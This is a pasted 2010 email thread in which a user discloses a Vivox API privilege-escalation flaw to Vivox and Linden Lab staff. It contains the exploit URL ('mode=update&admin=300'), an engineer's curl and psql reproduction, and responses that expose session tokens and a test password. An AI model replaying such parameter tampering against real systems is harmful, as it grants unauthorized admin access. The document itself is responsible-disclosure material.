API tools faq
paste
Advertisement
Guest User

Zidonuke

a guest
Sep 1st, 2010
1,227
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 27.48 KB | None | 0 0
raw download clone embed print report
  1. SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
  2. Inbox
  3. X
  4. Reply
  5. from Zidonuke <[email protected]>
  6. to [email protected],
  7. [email protected],
  8. [email protected],
  9. [email protected],
  10. [email protected],
  11. [email protected],
  12. [email protected],
  13. [email protected],
  14. [email protected],
  15. [email protected],
  16. [email protected],
  17. [email protected],
  18. [email protected],
  19. [email protected],
  20. [email protected],
  21. [email protected],
  22. [email protected],
  23. [email protected],
  24. [email protected],
  25. [email protected],
  26. [email protected],
  27. [email protected],
  28. [email protected]
  29. date Fri, Jul 2, 2010 at 9:56 PM
  30. subject SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
  31. mailed-by gmail.com
  32. hide details Jul 2
  33. -----BEGIN PGP SIGNED MESSAGE-----
  34. Hash: SHA1
  35.  
  36. This has been sent to vivox staff which I took from the admin interface
  37. since this is a vivox side exploit.
  38.  
  39. By adding a "admin" parameter to the request while logged in with "ANY"
  40. (Normal User, Admin, Whatever) will change the admin flag of that user
  41. without any checks.
  42.  
  43. Example: Will grant me Operations Admin rights
  44. http://www.bhr.vivox.com/api2/viv_acct.php?mode=update&admin=300
  45.  
  46. Response:
  47. <response xmlns="http://www.vivox.com"
  48. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  49. xsi:schemaLocation= "/xsd/user_info.xsd">
  50. <level0><status>OK</status><cookie_name>vx_session</cookie_name><cookie>xHPoFq2qhT1eklXlxyWzE6w==:1328121961:967ece1f76f419701c13d7f8247af98b:216.40.74.14</cookie><auth_token>xHPoFq2qhT1eklXlxyWzE6w==:1328121961:967ece1f76f419701c13d7f8247af98b:216.40.74.14</auth_token><body><level2><email></email><admin>300</admin><accountid>8024251</accountid><username>xHPoFq2qhT1eklXlxyWzE6w==</username><sip_realm>bhr.vivox.com</sip_realm><number></number><lang>eng</lang><alias></alias><firstname>Melfina</firstname><lastname>Sapphire</lastname><displayname>Melfina%20Sapphire</displayname><gender></gender><age>60</age><timezone>5</timezone><phone></phone><company></company><country></country><ext_id></ext_id><ext_profile></ext_profile><status>2</status><created>2010-04-11
  51. 18:52:13.057839-04</created><modified>2010-07-02
  52. 21:52:41.797926-04</modified><accessed>2010-07-02
  53. 21:11:02.559563-04</accessed><trialend>2030-01-01
  54. 00:00:00-05</trialend><ctype>0107121206</ctype><font_default>0</font_default><postlogin>0</postlogin><score>0</score><alias_parity>t</alias_parity></level2><level2><setting></setting></level2></body></level0>
  55.  
  56. </response>
  57.  
  58. Goodluck to you all to you all on fixing this.
  59. Please note, No servers or accounts or anything has been harmed in the
  60. exploitation of this.
  61.  
  62. If you would like more info or need me for anything please feel free to
  63. email me back.
  64.  
  65. [email protected]
  66. -----BEGIN PGP SIGNATURE-----
  67. Version: GnuPG v1.4.10 (MingW32)
  68. Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
  69.  
  70. iQEcBAEBAgAGBQJMLpi2AAoJEG12Dp/mJePAGYAH/ivRrLi45l35sWfV9z9ns73U
  71. w069XNDOPGwmoUuZz3BmEy+ZGRv/DhiY40ZRc/4bOz8fcVKkaYu/k8CnBayQF8BN
  72. 5RgBZF0rboqkZ1DwwxQHE5NJrl8ldsQ8BT1IOH1HqEWFSizeW3m0sL8jbT8ud/cQ
  73. Esryx9Jt3r5ajFTZyyC2e8pVEDiEiwQuzBSNUjxkcHynpVW1yywXdhLq9C+ixWp9
  74. o30w9SkAI+LE1/XG6QJKc7vBaHnOuaxuTiKgX2/bezLmySmKNFah6c5gYmzgHP10
  75. wbRz09b7QhfaJ7ip7CzJjkiRiv2yGew3b8qrx+YyJsurHxW5Z5NR3ITzHCYHScM=
  76. =0Gyc
  77. -----END PGP SIGNATURE-----
  78. Reply
  79. Reply to all
  80. Forward
  81. Reply
  82. from Mail Delivery System <[email protected]>
  83. to [email protected]
  84. date Fri, Jul 2, 2010 at 9:56 PM
  85. subject Undelivered Mail Returned to Sender
  86. mailed-by ast4a.vivox.com
  87. hide details Jul 2
  88. This is the mail system at host lib4.vivox.com.
  89.  
  90. I'm sorry to have to inform you that your message could not
  91. be delivered to one or more recipients. It's attached below.
  92.  
  93. For further assistance, please send mail to <postmaster>
  94.  
  95. If you do so, please include this problem report. You can
  96. delete your own text from the attached returned message.
  97.  
  98. The mail system
  99.  
  100. <[email protected]>: host mail5a.vivox.com[70.42.62.81] said: 550 5.1.1
  101. <[email protected]>: Recipient address rejected: vivox.com (in reply to RCPT
  102. TO command)
  103.  
  104. <[email protected]>: host mail5a.vivox.com[70.42.62.81] said: 550 5.1.1
  105. <[email protected]>: Recipient address rejected: vivox.com (in reply to RCPT
  106. TO command)
  107.  
  108. <[email protected]>: host mail5a.vivox.com[70.42.62.81] said: 550 5.1.1
  109. <[email protected]>: Recipient address rejected: vivox.com (in reply to
  110. RCPT TO command)
  111.  
  112. <[email protected]>: host mail5a.vivox.com[70.42.62.81] said: 550 5.1.1
  113. <[email protected]>: Recipient address rejected: vivox.com (in reply to RCPT
  114. TO command)
  115.  
  116. Final-Recipient: rfc822; [email protected]
  117. Original-Recipient: rfc822;[email protected]
  118. Action: failed
  119. Status: 5.1.1
  120. Remote-MTA: dns; mail5a.vivox.com
  121. Diagnostic-Code: smtp; 550 5.1.1 <[email protected]>: Recipient address rejected:
  122. vivox.com
  123.  
  124. Final-Recipient: rfc822; [email protected]
  125. Original-Recipient: rfc822;[email protected]
  126. Action: failed
  127. Status: 5.1.1
  128. Remote-MTA: dns; mail5a.vivox.com
  129. Diagnostic-Code: smtp; 550 5.1.1 <[email protected]>: Recipient address
  130. rejected: vivox.com
  131.  
  132. Final-Recipient: rfc822; [email protected]
  133. Original-Recipient: rfc822;[email protected]
  134. Action: failed
  135. Status: 5.1.1
  136. Remote-MTA: dns; mail5a.vivox.com
  137. Diagnostic-Code: smtp; 550 5.1.1 <[email protected]>: Recipient address
  138. rejected: vivox.com
  139.  
  140. Final-Recipient: rfc822; [email protected]
  141. Original-Recipient: rfc822;[email protected]
  142. Action: failed
  143. Status: 5.1.1
  144. Remote-MTA: dns; mail5a.vivox.com
  145. Diagnostic-Code: smtp; 550 5.1.1 <[email protected]>: Recipient address rejected:
  146. vivox.com
  147.  
  148.  
  149. ---------- Forwarded message ----------
  150. From: Zidonuke <[email protected]>
  151. To: [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected]
  152. Date: Fri, 02 Jul 2010 21:56:06 -0400
  153. Subject: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
  154. -----BEGIN PGP SIGNED MESSAGE-----
  155. Hash: SHA1
  156.  
  157. This has been sent to vivox staff which I took from the admin interface
  158. since this is a vivox side exploit.
  159.  
  160. By adding a "admin" parameter to the request while logged in with "ANY"
  161. (Normal User, Admin, Whatever) will change the admin flag of that user
  162. without any checks.
  163.  
  164. Example: Will grant me Operations Admin rights
  165. http://www.bhr.vivox.com/api2/viv_acct.php?mode=update&admin=300
  166.  
  167. Response:
  168. <response xmlns="http://www.vivox.com"
  169. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  170. xsi:schemaLocation= "/xsd/user_info.xsd">
  171. <level0><status>OK</status><cookie_name>vx_session</cookie_name><cookie>xHPoFq2qhT1eklXlxyWzE6w==:1328121961:967ece1f76f419701c13d7f8247af98b:216.40.74.14</cookie><auth_token>xHPoFq2qhT1eklXlxyWzE6w==:1328121961:967ece1f76f419701c13d7f8247af98b:216.40.74.14</auth_token><body><level2><email></email><admin>300</admin><accountid>8024251</accountid><username>xHPoFq2qhT1eklXlxyWzE6w==</username><sip_realm>bhr.vivox.com</sip_realm><number></number><lang>eng</lang><alias></alias><firstname>Melfina</firstname><lastname>Sapphire</lastname><displayname>Melfina%20Sapphire</displayname><gender></gender><age>60</age><timezone>5</timezone><phone></phone><company></company><country></country><ext_id></ext_id><ext_profile></ext_profile><status>2</status><created>2010-04-11
  172. 18:52:13.057839-04</created><modified>2010-07-02
  173. 21:52:41.797926-04</modified><accessed>2010-07-02
  174. 21:11:02.559563-04</accessed><trialend>2030-01-01
  175. 00:00:00-05</trialend><ctype>0107121206</ctype><font_default>0</font_default><postlogin>0</postlogin><score>0</score><alias_parity>t</alias_parity></level2><level2><setting></setting></level2></body></level0>
  176.  
  177. </response>
  178.  
  179. Goodluck to you all to you all on fixing this.
  180. Please note, No servers or accounts or anything has been harmed in the
  181. exploitation of this.
  182.  
  183. If you would like more info or need me for anything please feel free to
  184. email me back.
  185.  
  186. [email protected]
  187. -----BEGIN PGP SIGNATURE-----
  188. Version: GnuPG v1.4.10 (MingW32)
  189. Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
  190.  
  191. iQEcBAEBAgAGBQJMLpi2AAoJEG12Dp/mJePAGYAH/ivRrLi45l35sWfV9z9ns73U
  192. w069XNDOPGwmoUuZz3BmEy+ZGRv/DhiY40ZRc/4bOz8fcVKkaYu/k8CnBayQF8BN
  193. 5RgBZF0rboqkZ1DwwxQHE5NJrl8ldsQ8BT1IOH1HqEWFSizeW3m0sL8jbT8ud/cQ
  194. Esryx9Jt3r5ajFTZyyC2e8pVEDiEiwQuzBSNUjxkcHynpVW1yywXdhLq9C+ixWp9
  195. o30w9SkAI+LE1/XG6QJKc7vBaHnOuaxuTiKgX2/bezLmySmKNFah6c5gYmzgHP10
  196. wbRz09b7QhfaJ7ip7CzJjkiRiv2yGew3b8qrx+YyJsurHxW5Z5NR3ITzHCYHScM=
  197. =0Gyc
  198. -----END PGP SIGNATURE-----
  199.  
  200. Reply
  201. Forward
  202. Reply
  203. from Mail Delivery Subsystem <[email protected]>
  204. to [email protected]
  205. date Fri, Jul 2, 2010 at 9:56 PM
  206. subject Delivery Status Notification (Failure)
  207. hide details Jul 2
  208. Delivery to the following recipient failed permanently:
  209.  
  210. [email protected]
  211.  
  212. Technical details of permanent failure:
  213. Google tried to deliver your message, but it was rejected by the recipient domain. We recommend contacting the other email provider for further information about the cause of this error. The error that the other server returned was: 550 550 5.2.1 The email account that you tried to reach is disabled. e12si2574720wam.142 (state 17).
  214.  
  215. ----- Original message -----
  216.  
  217. Received: by 10.229.218.16 with SMTP id ho16mr1083453qcb.13.1278122167979;
  218. Fri, 02 Jul 2010 18:56:07 -0700 (PDT)
  219. Return-Path: <[email protected]>
  220. Received: from [192.168.0.198] ([216.40.74.14])
  221. by mx.google.com with ESMTPS id m24sm5354550qck.29.2010.07.02.18.56.06
  222. (version=SSLv3 cipher=RC4-MD5);
  223. Fri, 02 Jul 2010 18:56:07 -0700 (PDT)
  224. Message-ID: <[email protected]>
  225. Date: Fri, 02 Jul 2010 21:56:06 -0400
  226. From: Zidonuke <[email protected]>
  227. User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.4) Gecko/20100608 Thunderbird/3.1
  228. MIME-Version: 1.0
  229. To: [email protected], [email protected], [email protected], [email protected],
  230. [email protected], [email protected], [email protected],
  231. [email protected], [email protected], [email protected],
  232. [email protected], [email protected], [email protected],
  233. [email protected], [email protected], [email protected],
  234. [email protected], [email protected], [email protected], [email protected],
  235. [email protected], [email protected], [email protected]
  236. Subject: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
  237. X-Enigmail-Version: 1.1.1
  238. Content-Type: text/plain; charset=ISO-8859-1
  239. Content-Transfer-Encoding: 7bit
  240. - Show quoted text -
  241. Reply
  242. Forward
  243. Reply
  244. from Ken Cox <[email protected]>
  245. to Zidonuke <[email protected]>
  246. date Fri, Jul 2, 2010 at 10:18 PM
  247. subject Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
  248. mailed-by vivox.com
  249. hide details Jul 2
  250. It's true.
  251.  
  252. [kenstir@lab0c ~]$ psql -h dbp.mpsl.vivox.com -U apache prov_mpsl -c "select acc_id,acc_admin,acc_name,acc_password from accounts where acc_name='tester1'"
  253. acc_id | acc_admin | acc_name | acc_password
  254. --------+-----------+----------+--------------
  255. 29 | 0 | tester1 | foobar
  256. (1 row)
  257.  
  258. [kenstir@lab0c ~]$ curl -i 'http://www.mpsl.vivox.com/api2/viv_acct.php?mode=update&admin=300&auth_token=tester1:1328123230:f98f6ebb1e1158ce5d0f7c3c44435ade:10.1.1.232'
  259. HTTP/1.1 200 OK
  260. Date: Sat, 03 Jul 2010 02:18:22 GMT
  261. Server: Apache/2.2.3 (CentOS)
  262. X-Powered-By: PHP/5.1.6
  263. Cache-Control: no-store, no-cache, must-revalidate
  264. Set-Cookie: vx_session=tester1%3A1328123502%3Af06ca5f225f1351709447533277b4b60%3A10.1.1.232; path=/
  265. Expires: Mon, 26 Jul 1997 05:00:00 GMT
  266. Last-Modified: Sat, 03 Jul 2010 02:18:22 GMT
  267. Cache-Control: post-check=0, pre-check=0
  268. Pragma: no-cache
  269. Content-Length: 1252
  270. Connection: close
  271. Content-Type: text/xml; charset=utf-8
  272.  
  273. <?xml version="1.0" encoding="UTF-8" ?>
  274. <response xmlns="http://www.vivox.com"
  275. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  276. xsi:schemaLocation= "/xsd/user_info.xsd">
  277. <level0><status>OK</status><cookie_name>vx_session</cookie_name><cookie>tester1:1328123502:f06ca5f225f1351709447533277b4b60:10.1.1.232</cookie><auth_token>tester1:1328123502:f06ca5f225f1351709447533277b4b60:10.1.1.232</auth_token><body><level2><admin>300</admin><accountid>29</accountid><username>tester1</username><sip_realm>mpsl.vivox.com</sip_realm><number></number><lang>eng</lang><alias></alias><email>[email protected]</email><firstname>tester1</firstname><lastname>morpheus</lastname><displayname>Mr</displayname><gender>male</gender><age>33</age><timezone>1</timezone><phone></phone><company></company><country></country><ext_id></ext_id><ext_profile></ext_profile><status>2</status><created>2007-12-05 09:50:01.021208-05</created><modified>2010-07-02 22:18:22.02362-04</modified><accessed>2010-07-02 22:13:17.526063-04</accessed><trialend>2030-01-01 00:00:00-05</trialend><ctype></ctype><font_default>0</font_default><postlogin>0</postlogin><score>0</score><alias_parity>t</alias_parity></level2><level2><setting></setting></level2></body></level0>
  278. </response>
  279. [kenstir@lab0c ~]$ psql -h dbp.mpsl.vivox.com -U apache prov_mpsl -c "select acc_id,acc_admin,acc_name,acc_password from accounts where acc_name='tester1'"
  280. acc_id | acc_admin | acc_name | acc_password
  281. --------+-----------+----------+--------------
  282. 29 | 300 | tester1 | foobar
  283. (1 row)
  284. Reply
  285. Forward
  286. Reply
  287. from Ken Cox <[email protected]>
  288. to Zidonuke <[email protected]>
  289. date Fri, Jul 2, 2010 at 10:20 PM
  290. subject Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
  291. mailed-by vivox.com
  292. hide details Jul 2
  293. Zidonuke,
  294.  
  295. Thank you for bringing this to our attention.
  296.  
  297. -kenstir
  298.  
  299.  
  300. Reply
  301. Forward
  302. Reply
  303. from Zidonuke <[email protected]>
  304. to Ken Cox <[email protected]>
  305. date Fri, Jul 2, 2010 at 10:22 PM
  306. subject Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
  307. mailed-by gmail.com
  308. hide details Jul 2
  309. -----BEGIN PGP SIGNED MESSAGE-----
  310. Hash: SHA1
  311.  
  312. - Show quoted text -
  313. Your very welcome. I was working on some second life related things that
  314. work with the api2 urls. I was running a font_default update and noticed
  315. the field <admin>. So I was like... Ok... lets add &admin=300 to the url.
  316.  
  317. Anyways, Goodluck to you all on fixing it.
  318. -----BEGIN PGP SIGNATURE-----
  319. Version: GnuPG v1.4.10 (MingW32)
  320. Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
  321.  
  322. iQEcBAEBAgAGBQJMLp8BAAoJEG12Dp/mJePAZC8H/iEzm68U5zbpNXkS/QamxqnU
  323. algzq8EbEiMx/jJi5DMZWDz4lq4+K/PLmv4PerDGHPiG5fqWgJTcA66ksnbR59FA
  324. BMWhXjsjFf8Uw/l3VfR41bix19fp8AX8Tt7ldCaJ4+SlqVjaYzvKFF2qdhPghm/1
  325. oXqbQgyAvv7CSd9AQGlpz6PtjaJl/sTY3ObPS5hW3WdrQxsNKN7ILQwOZ2iuEiTu
  326. +IBOCTTL7yI0at3RgwenakOWazNc0cbt7eXWBvTMXIjk8JWvWWN8tuCNwgMvEvl4
  327. BYiTnU2oeUSLjvpkEv0dQ0oOiiQhaYkJEikGfdaohAJOT7isU459vwMxDLCtw6E=
  328. =RWbs
  329. -----END PGP SIGNATURE-----
  330. Reply
  331. Forward
  332. Reply
  333. from Zidonuke <[email protected]>
  334. to Ken Cox <[email protected]>
  335. date Fri, Jul 2, 2010 at 10:47 PM
  336. subject Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
  337. mailed-by gmail.com
  338. hide details Jul 2
  339. -----BEGIN PGP SIGNED MESSAGE-----
  340. Hash: SHA1
  341.  
  342. On 7/2/2010 10:20 PM, Ken Cox wrote:
  343. - Show quoted text -
  344. Ohhh btw. You guys couldn't let me keep the Operations Admin Role for
  345. that account? haha.
  346. -----BEGIN PGP SIGNATURE-----
  347. Version: GnuPG v1.4.10 (MingW32)
  348. Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
  349.  
  350. iQEcBAEBAgAGBQJMLqTKAAoJEG12Dp/mJePA7NwH/A0J3DuAnIiFBsIdTetSIW7D
  351. gp8JSNUc2YleyxgsC0yPN+3VWZ9dhp2F+QM0OV+FdNsxNLuFMRmq9FoNpLSwOFNl
  352. YqJP12ePS0W0rynijw8LPmPFwnSTc21jJws/L/gCaO/Ec/wPp0zwozZXULQNw80Z
  353. dM30KhjBi7BXAKy4qAwafDhiLpaKdXR5r+pu1hn6pR/eKt9wsUsx41o21lRIxoXO
  354. 6F21XvN2idNcm5JBKu2Uw7Q3nrq1sc+OXV6NbcZcOuYvhMd3t21lEOinv8i+9aJn
  355. vTQhvwV42c1HcSJssnCkHZIjBuvf77DGoh2/BfohFABYgR8HxtEeGN39Y6Kg/DU=
  356. =IE6F
  357. -----END PGP SIGNATURE-----
  358. Reply
  359. Forward
  360. Reply
  361. from Brian McGroarty <[email protected]>
  362. to [email protected]
  363. date Fri, Jul 2, 2010 at 10:47 PM
  364. subject Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
  365. hide details Jul 2
  366. Thank you for this report, and for pushing it to a wide audience at
  367. Vivox and Linden Lab. I'm leaning on Vivox to try and get this
  368. addressed despite the holiday weekend. In the mean time, I would
  369. appreciate it if you wouldn't discuss this with anyone else. I don't
  370. know how responsive their engineers will be.
  371.  
  372. Have you seen any third-party discussions to date?
  373.  
  374. > From: Zidonuke <[email protected]>
  375. > Date: Fri, Jul 2, 2010 at 6:56 PM
  376. > Subject: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
  377. > To: [email protected], [email protected], [email protected], [email protected],
  378. > [email protected], [email protected], [email protected], [email protected],
  379. > [email protected], [email protected], [email protected],
  380. > [email protected], [email protected], [email protected],
  381. > [email protected], [email protected], [email protected], [email protected],
  382. > [email protected], [email protected], [email protected], [email protected],
  383. > [email protected]
  384. >
  385. >
  386. - Show quoted text -
  387. > --
  388. > Joe Miller
  389. > VP, Platform & Technology Development
  390. > Linden Research, Inc.
  391. > 945 Battery St.
  392. > SF, CA 94111
  393. >
  394. > 925 452-7578 direct
  395. >
  396.  
  397.  
  398.  
  399. --
  400. Brian McGroarty | Linden Lab
  401. Sent from my Newton MP2100 via acoustic coupler
  402. Reply
  403. Forward
  404. Reply
  405. from Zidonuke <[email protected]>
  406. to Brian McGroarty <[email protected]>
  407. date Fri, Jul 2, 2010 at 10:51 PM
  408. subject Fwd: Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
  409. mailed-by gmail.com
  410. hide details Jul 2
  411. -----BEGIN PGP SIGNED MESSAGE-----
  412. Hash: SHA1
  413.  
  414. Vivox has already contacted me and gave me info.
  415. Also the account I escalated to Operations Admin was already removed.
  416. It appears it will be fixed as soon as possible.
  417. Also no one else knows about this exploit. So far I'm the only one who
  418. knows about it.
  419.  
  420. On a final note. Can I Haz A Cookie Soft? :3
  421.  
  422. Zidonuke (Melfina Marshdevil)
  423.  
  424. - -------- Original Message --------
  425. Subject: Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
  426. Date: Fri, 2 Jul 2010 22:20:18 -0400 (EDT)
  427. From: Ken Cox <[email protected]>
  428. To: Zidonuke <[email protected]>
  429.  
  430. Zidonuke,
  431.  
  432. Thank you for bringing this to our attention.
  433.  
  434. - -kenstir
  435.  
  436. - -------- Original Message --------
  437. Subject: Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
  438. Date: Fri, 2 Jul 2010 22:18:50 -0400 (EDT)
  439. From: Ken Cox <[email protected]>
  440. To: Zidonuke <[email protected]>
  441. - Show quoted text -
  442. <response xmlns="http://www.vivox.com"
  443. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  444. xsi:schemaLocation= "/xsd/user_info.xsd">
  445. <level0><status>OK</status><cookie_name>vx_session</cookie_name><cookie>tester1:1328123502:f06ca5f225f1351709447533277b4b60:10.1.1.232</cookie><auth_token>tester1:1328123502:f06ca5f225f1351709447533277b4b60:10.1.1.232</auth_token><body><level2><admin>300</admin><accountid>29</accountid><username>tester1</username><sip_realm>mpsl.vivox.com</sip_realm><number></number><lang>eng</lang><alias></alias><email>[email protected]</email><firstname>tester1</firstname><lastname>morpheus</lastname><displayname>Mr</displayname><gender>male</gender><age>33</age><timezone>1</timezone><phone></phone><company></company><country></country><ext_id></ext_id><ext_profile></ext_profile><status>2</status><created>2007-12-05
  446. 09:50:01.021208-05</created><modified>2010-07-02
  447. 22:18:22.02362-04</modified><accessed>2010-07-02
  448. 22:13:17.526063-04</accessed><trialend>2030-01-01
  449. 00:00:00-05</trialend><ctype></ctype><font_default>0</font_default><postlogin>0</postlogin><score>0</score><alias_parity>t</alias_parity></level2><level2><setting></setting></level2></body></level0>
  450. </response>
  451. [kenstir@lab0c ~]$ psql -h dbp.mpsl.vivox.com -U apache prov_mpsl -c
  452. "select acc_id,acc_admin,acc_name,acc_password from accounts where
  453. acc_name='tester1'"
  454. acc_id | acc_admin | acc_name | acc_password
  455. - --------+-----------+----------+--------------
  456. 29 | 300 | tester1 | foobar
  457. (1 row)
  458.  
  459. -----BEGIN PGP SIGNATURE-----
  460. Version: GnuPG v1.4.10 (MingW32)
  461. Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
  462.  
  463. iQEcBAEBAgAGBQJMLqXDAAoJEG12Dp/mJePAxewIAKHbDNH33PYN6vxB7262cjtG
  464. cFC9Cd4NyOKruBe3wPgNytZoQyxpUMvfogPyx/OOzFdc4sBeVm1Pa2VthhDBFYQo
  465. 4qUq3GBCTk2QE6VxrJ5soBXmVcT3ReTHHeiNcmZUcq8e3hmHAhtsOoiHLsEWgvq6
  466. HAAz2PZz8mUzxTCABIw5TOya53SJBOpZ9hLWC/k8mSpOhLHmMfNsfjydCdgt3HSM
  467. 6w7T6Y35mbZ9laz4MQk26RJDCdpYbiAFsJFbz+7vc4zVUd/47VNc3wdCj3rahR5J
  468. 4irVgHuVnzQInTBZt/xvpioeFCThFNanKDRzenHoM94Zkf8vrxXA/IRbfOtKeVo=
  469. =qF/K
  470. -----END PGP SIGNATURE-----
  471. Reply
  472. Forward
  473. Reply
  474. from Ken Cox <[email protected]>
  475. to Zidonuke <[email protected]>
  476. date Fri, Jul 2, 2010 at 10:55 PM
  477. subject Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
  478. mailed-by vivox.com
  479. hide details Jul 2
  480. Sorry, though I did let you keep voice! I really do appreciate your wearing the white hat on this issue and letting us know without further exploit. So the deactivates/activates I saw yesterday were just you playing around? Good.
  481.  
  482. kenstir
  483. Reply
  484. Forward
  485. Reply
  486. from Zidonuke <[email protected]>
  487. to Ken Cox <[email protected]>
  488. date Fri, Jul 2, 2010 at 11:01 PM
  489. subject Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
  490. mailed-by gmail.com
  491. hide details Jul 2
  492. -----BEGIN PGP SIGNED MESSAGE-----
  493. Hash: SHA1
  494.  
  495. I assure you that no harm was done to any accounts. If there is any
  496. damage then you all can do your worst. It was very interested to learn
  497. how your guy's backend systems worked.
  498.  
  499. Most of the stuff I did was viewing, and I'll have to admit I did test
  500. ban myself and turned this one channel into a conference but as I said I
  501. did reversed anything I did.
  502.  
  503. As of right now I don't see any other exploits but I have a feeling that
  504. there may be more.
  505.  
  506. Anything from my IP range was me:
  507. NetRange: 216.40.64.0 - 216.40.95.255
  508. CIDR: 216.40.64.0/19
  509.  
  510. Also the accounts
  511. lolhax
  512. lolhax# <-- Whatever number
  513. TestAdmin2
  514. xN788byUiSE252PJ0E5ZgiQ==
  515. xHPoFq2qhT1eklXlxyWzE6w==
  516.  
  517. On 7/2/2010 10:55 PM, Ken Cox wrote:
  518. > Sorry, though I did let you keep voice! I really do appreciate your wearing the white hat on this issue and letting us know without further exploit. So the deactivates/activates I saw yesterday were just you playing around? Good.
  519. >
  520. > kenstir
  521.  
  522. -----BEGIN PGP SIGNATURE-----
  523. Version: GnuPG v1.4.10 (MingW32)
  524. Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
  525.  
  526. iQEcBAEBAgAGBQJMLqgjAAoJEG12Dp/mJePAqNMH/iKP3Odp3fpo2jGHEsFoCjcH
  527. W0Hz/qntgc1VgWw1mKfgwDKFqzIl3QEcOkW8uJ/OeiVs0g8rW6h6HEQG4BcLnlSA
  528. q6RUShqOBhQSlPZBL0jmlXg1AHb/qSay146R3Dw7yAC1o+IhwALS/Zbs4UpSnUEW
  529. jq0edShSmVCuBzA6w1SmWrBZJldOormhsssSMWDAneEaJIWCTDGzD7qUKmuOAokz
  530. d2fBb+9ylC6Qix0YNlHbJMEwcCFsfL+bZFNhEuhYtWt4Ilhml7bcvupuXbOO6z6s
  531. 4BkwRO9V02Ff4FJtBDOHywh/a52k6TuqSWYkqdE//Aj25l6R0V7Jp33iWguZkvE=
  532. =DPnB
  533. -----END PGP SIGNATURE-----
  534. Reply
  535. Forward
  536. Reply
  537. from Brian McGroarty <[email protected]>
  538. to Zidonuke <[email protected]>
  539. date Fri, Jul 2, 2010 at 11:04 PM
  540. subject Re: Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
  541. hide details Jul 2
  542. Ha! You are welcome to all my cookies, outside the browser context.
  543.  
  544. Again, thank you. I'm glad someone with good intent found this.
  545.  
  546. And at this point I'm tempted to fly out to Vivox and do physical
  547. harm. What a mess.
  548. - Show quoted text -
  549. - Show quoted text -
  550. Reply
  551. Forward
  552. Reply
  553. from Zidonuke <[email protected]>
  554. to Brian McGroarty <[email protected]>
  555. date Fri, Jul 2, 2010 at 11:09 PM
  556. subject Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
  557. mailed-by gmail.com
  558. hide details Jul 2
  559. -----BEGIN PGP SIGNED MESSAGE-----
  560. Hash: SHA1
  561.  
  562. On a side note. This effects all of there services.
  563. I'm a EVE Online player and was able to escalate my player account to
  564. Ops Admin on the EVE Vivox.
  565.  
  566. So LL shouldn't feel bad.
  567.  
  568. We should talk later tho. I've seen you around numerous times and never
  569. got a chance to say Hi more directly. See you around in SL one day.
  570.  
  571. Zidonuke (Melfina Marshdevil)
  572.  
  573. On 7/2/2010 11:04 PM, Brian McGroarty wrote:
  574. > Ha! You are welcome to all my cookies, outside the browser context.
  575. >
  576. > Again, thank you. I'm glad someone with good intent found this.
  577. >
  578. > And at this point I'm tempted to fly out to Vivox and do physical
  579. > harm. What a mess.
  580. >
  581. > On Fri, Jul 2, 2010 at 7:51 PM, Zidonuke <[email protected]> wrote:
  582. - Show quoted text -
  583. iQEcBAEBAgAGBQJMLqnyAAoJEG12Dp/mJePAM4AH/jsttDpZbovG3BxS75ld5izs
  584. tyanv4nxgy1g2ej5evQrhdSiioQXI77WwT94eA5/8zn6QWumE5467mMVnbrOnaxZ
  585. q6YuTSqEeXEZLCRq9OJbi2soLWvretLTE9CwxVXG/3UuTlXKAg6X0fnCqBatEM3p
  586. cGddiUpUT84O6XkDEdECGWyDNgzdyYf+lybADRAhuBTWsWsK00uVYihYQt7G239U
  587. ISErL6iElwhLimhlnNxm7s7/BnVGkUKoUj5ZslVXyD74dTEZeteb8APvAxiYf5lc
  588. gME3mneNLJjOEQd667/vDuBp9d2j5hMsIBU+VpigKkDjYK2ya8IiVOMqSKKPzIo=
  589. =Biiu
  590. -----END PGP SIGNATURE-----
  591. Reply
  592. Forward
  593. Reply
  594. from Ken Cox <[email protected]>
  595. to Zidonuke <[email protected]>
  596. date Fri, Jul 2, 2010 at 11:39 PM
  597. subject Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
  598. mailed-by vivox.com
  599. hide details Jul 2
  600. Thanks, I do appreciate that you've gone out of your way to be helpful. Please let me and [email protected] know of any other issues you find. I believe the privilege escalation issue is now fixed.
  601.  
  602. kenstir
  603. Reply
  604. Forward
  605. Reply
  606. from Zidonuke <[email protected]>
  607. to Brian McGroarty <[email protected]>
